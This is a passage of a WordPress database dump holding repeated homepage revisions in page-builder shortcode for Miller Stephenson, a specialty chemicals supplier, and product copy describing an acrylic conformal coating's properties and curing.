LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICALCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n\r\n<h3>Technical Support</h3>Our team of experts are available to provide you with a level of service and attention unsurpassed in the industry.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Application Experts</h3>With over 50 years of knowledge &amp; experience,  Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Large Inventory</h3>We are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="627" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="624" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="626"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="596"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="602"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="610"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-19 16:41:22', '2016-08-19 16:41:22', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (630, 3, '2016-08-19 16:44:32', '2016-08-19 16:44:32', '', 'Epon resin', '', 'inherit', 'open', 'closed', '', 'epon-resin', '', '', '2016-08-19 16:44:32', '2016-08-19 16:44:32', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Epon-resin.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (631, 3, '2016-08-19 16:47:50', '2016-08-19 16:47:50', '[product_categories number="10" parent="0" columns="8" title="Our categories"]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" text_width="70%" text_align="center" text_pos="center" parallax="0" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Semi-Permanent Mold Release</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]', 'Products', '', 'inherit', 'closed', 'closed', '', '116-revision-v1', '', '', '2016-08-19 16:47:50', '2016-08-19 16:47:50', '', 116, 'https://132.148.10.86/wordpress/116-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (632, 1, '2016-08-20 18:13:55', '2016-08-20 18:13:55', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™&amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS<br>&amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp;<br> CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL<br>CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO<br>RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n\r\n<h3>Technical Support</h3>Our team of experts are available to provide you with a level of service and attention unsurpassed in the industry.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Application Experts</h3>With over 50 years of knowledge &amp; experience,  Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Large Inventory</h3>We are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="627" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="624" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="626"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="596"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="602"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="610"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-20 18:13:55', '2016-08-20 18:13:55', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (633, 1, '2016-08-20 18:14:42', '2016-08-20 18:14:42', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™<br>&amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS<br>&amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp;<br> CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL<br>CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO<br>RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n\r\n<h3>Technical Support</h3>Our team of experts are available to provide you with a level of service and attention unsurpassed in the industry.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Application Experts</h3>With over 50 years of knowledge &amp; experience,  Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Large Inventory</h3>We are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="627" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="624" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="626"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="596"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="602"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="610"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-20 18:14:42', '2016-08-20 18:14:42', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (634, 1, '2016-08-20 18:15:10', '2016-08-20 18:15:10', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™<br>&amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS<br>&amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY<br>&amp;CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL<br>CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO<br>RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n\r\n<h3>Technical Support</h3>Our team of experts are available to provide you with a level of service and attention unsurpassed in the industry.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Application Experts</h3>With over 50 years of knowledge &amp; experience,  Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Large Inventory</h3>We are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="627" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="624" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="626"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="596"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="602"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="610"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-20 18:15:10', '2016-08-20 18:15:10', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (635, 1, '2016-08-20 18:21:40', '2016-08-20 18:21:40', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™<br>&amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS<br>&amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY<br>&amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL<br>CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO<br>RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n\r\n<h3>Technical Support</h3>Our team of experts are available to provide you with a level of service and attention unsurpassed in the industry.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Application Experts</h3>With over 50 years of knowledge &amp; experience,  Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Large Inventory</h3>We are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="627" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="624" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="626"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="596"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="602"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="610"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-20 18:21:40', '2016-08-20 18:21:40', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (636, 3, '2016-10-11 13:42:05', '2016-10-11 13:42:05', 'Miller-Stephesons\' Acrylic Conformal Coatings offer superior toughness and abrasion resistance, excellent dielectric properties, fungal resistance, and moisture and environmental protection. Our formulation is 100% non-flammable. The acrylic resin meets the requirements of MIL-I-46058C Type AR. Printed circuit boards covered with acrylic coatings are repairable.  Simply heat the coating with a soldering iron to remove the components. MS-475C will cover 6.4 sq. ft. at a 2 mil. thickness per 1- aerosol can.\n\nCleanliness of the substrate is of extreme importance for the successful application of a conformal coating. Surfaces must be free of moisture, dirt, wax, grease, flux residues and all other contaminants. Contamination under the coating could cause problems that may lead to assembly failures. Printed circuit boards covered with acrylic conformal coatings are repairable.  Simply heat the coating with a soldering iron to remove the components. Drying and curing of acrylic coating depends upon evaporation of the solvent.  Air dry coated boards for 30 minutes at 77°F/25°C to remove solvents before curing in oven or applying additional coats. The recommended cure time is 45 minutes at 167°F/75°C.  The alternate cure is 24 hours at 77°F/25°C. Acrylic coating will be tack free in one hour, semi-hard in four hours, and fully cured in 24 hours.  Deaeration is not recommended.\n\nAcrylic Conformal Coatings are probably the easiest coating to remove and repair. The coating can be removed completely or locally by using specifically designed stripping chemistries. The board can then be re-coated completely of just in area of the repair. By being electrically insulating, it maintains long-term surface insulation resistance (SIR) levels and thus ensures the operational integrity of the assembly. It also provides a barrier to air-borne contaminants from the operating environment, such as salt-spray, thus preventing corrosion.  Some typical application examples include high-reliability defense, automotive and aerospace, where coatings are used to protect against various combinations of moisture, aggressive chemicals and vapours, salt sprays, large temperature variations, mechanical vibration, and even organic attack (e.g. fungus). The protective nature of conformal coatings also means that they not only protect, but also serve to enhance product reliability and thereby reduce the potential cost and damaging effects of early field failures.\n\n<a 